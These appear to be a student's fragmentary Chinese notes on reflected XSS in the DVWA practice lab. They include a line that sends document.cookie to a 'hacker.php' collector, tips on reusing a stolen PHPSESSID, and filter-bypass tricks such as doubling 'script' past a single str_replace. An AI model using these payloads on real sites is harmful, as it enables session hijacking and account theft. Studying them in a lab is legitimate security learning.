前情提要:html的dom对象:document
如document.cookie / document.write()
http://netsecurity.51cto.com/art/201311/417201.htm实战演示
1.判断是否有反射型XSS漏洞:
2.实践
http://www.storysec.com/dvwa-xss-reflected.html
https://www.cnblogs.com/wang1212-/p/9028349.html两个都给我看
img.src="http://localhost/xss/hacker.php?x=" + document.cookie; //document.location:将页面的内容指定到指定位置
其实不写hacker.js文件也行,直接url里构造就好了
+document.cookie的+是连接符而已,其实是替代了空格、回车!!!(+号可以用%2b编码)
//PHPSESSID后的value可以直接双击修改
@靶场实践DVWA-XSS(reflected)
教程http://www.storysec.com/dvwa-xss-reflected.html
https://www.cnblogs.com/wang1212-/p/9028349.html(更牛逼)
http://www.storysec.com/dvwa-xss-reflected.html(更更牛逼)
1.为啥在搜索框里输入不跳出弹窗?
(1)F12一下,html的
标签把<>实体化了,所以输入
,抵消掉原来的pre标签,弹窗就出来了(2)
法二:双写绕过 ‘>
ript>alert("如果你能看到,说明攻击成功")话说为什么要加'>啊?看另一个教程就没加'>,没有也可以跳出弹窗的说 str_replace()只过滤了一次